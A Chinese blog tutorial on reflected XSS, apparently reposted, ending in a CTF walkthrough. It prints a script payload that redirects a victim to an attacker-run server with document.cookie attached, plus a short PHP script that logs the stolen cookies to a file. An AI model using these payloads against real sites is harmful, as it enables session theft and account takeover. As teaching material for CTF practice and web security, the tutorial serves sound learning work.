当前位置: 首页 > article >正文

反射型XSS--理论

什么是XSS?

XSS(Cross Site Script),即跨站脚本攻击。

攻击的基本过程:

  1. 攻击者在Web页面里插入恶意的js代码;
  2. 用户浏览该页面时,嵌入界面的恶意代码被执行;
  3. 攻击者达到攻击目的。

XSS的三种类型:

  1. 反射型XSS
  2. 存储型XSS
  3. DOM型XSS

今天我们讲反射型XSS相关内容。

什么是反射型XSS?

攻击者事先在Web页面中植入恶意代码,一般是攻击链接。
当用户进入页面时,恶意代码不会自动执行,而是需要用户自己去点击链接后,反射型XSS攻击才会进行。

理论就是这么多,接下来我们举几个实例,来熟悉反射型XSS攻击的原理与恶意代码的形式。

实操环节!

注意看,这个题目叫反射型XSS:
在这里插入图片描述
当我们在祝福语文本栏写下内容,再点击生成链接,下方就会出现我们输入的内容。
例如输入Wh1teR0se:
在这里插入图片描述
页面既然回显了我们输入的内容,说明这个内容被写入了网页的HTML中。
查看源代码,果然发现我们输入的内容:
在这里插入图片描述
那我们就可以设想,既然输入的内容被写入了HTML中,那我们输入js代码,代码自然也会被写入HTML,网页不就能执行我们写入的代码了吗?
输入代码:<script>alert(1);</script>
在这里插入图片描述
js代码果然被执行。
那么我们输入恶意代码,获取“用户”的Cookie。
这里是一道CTF题目的靶机,当然不会有别的用户,这里的“用户”指的是网站配备的BOT,一般在XSS题目中,都会配备一个BOT来模拟用户的访问。所以我们输入恶意代码后,该BOT就会自动触发我们的恶意代码。

<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

location.href是页面跳转属性,后面是要跳转到的页面。
document.cookie读取页面Cookie。
xx.xx.xx.xx是自己的服务器。这里不能用127.0.0.1,因为本地服务器只有你自己能访问到,其他人是不能访问的,自然也就不会成功重定向到你的服务器。没有服务器的需要自己搭建一个服务器。

代码作用就是当用户进入我们植入js恶意代码的页面后,将被重定向到我们指定的URL,并且我们能获取到该用户的Cookie。

//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

该文件的作用是将cookie保存在cookie.txt文本文件中。

输入恶意代码后,成功跳转到自己的服务器。这时查看文本文件。
在这里插入图片描述得到flag.

反射型XSS的基本攻击原理就是这样,希望你能学会。


http://www.kler.cn/a/385876.html

相关文章:

  • Go语言中的类型
  • 【Hadoop实训】Hive 数据操作②
  • 数字IC后端低功耗设计实现案例分享(3个power domain,2个voltage domain)
  • ZooKeeper单机、集群模式搭建教程
  • Unity读取Json
  • css:浮动
  • AI时代IDE解析
  • 云服务器Linux部署war、jar包,并在nginx配置域名
  • express 使用JWT认证
  • 低空经济之星eVTOL研发技术详解
  • 越权访问漏洞
  • 基于MFC实现的赛车游戏
  • 大神狂秀技术 成功让三星手机用上macOS
  • 【hdfs】【hbase】【大数据技术基础】实践二 HBase Java API编程
  • 2024 CSS - 保姆级系列教程三 - 选择器与布局详解
  • 【MySQL】——数据库恢复技术
  • 数仓工具—Hive语法之窗口函数窗口范围/边界 range between和rows between
  • 黑马程序员Redis学习【持续更新】
  • 数据发生变化时(DOM)视图没有更新的原因及解决方案 - 2024最新版前端秋招面试短期突击面试题【100道】
  • 移动应用开发项目——图书影片管理系统【安卓项目|前后端】
  • Ubuntu /etc/sudo.conf is owned by uid 1000, should be 0 的一种解决方法
  • 掌握 .NET 8 中最小 API 的单元和集成测试:高质量代码的最佳实践
  • CTF —— 网络安全大赛
  • ABAP开发-12、Dialog屏幕开发_1
  • 设计模式-构建者
  • IO作业day4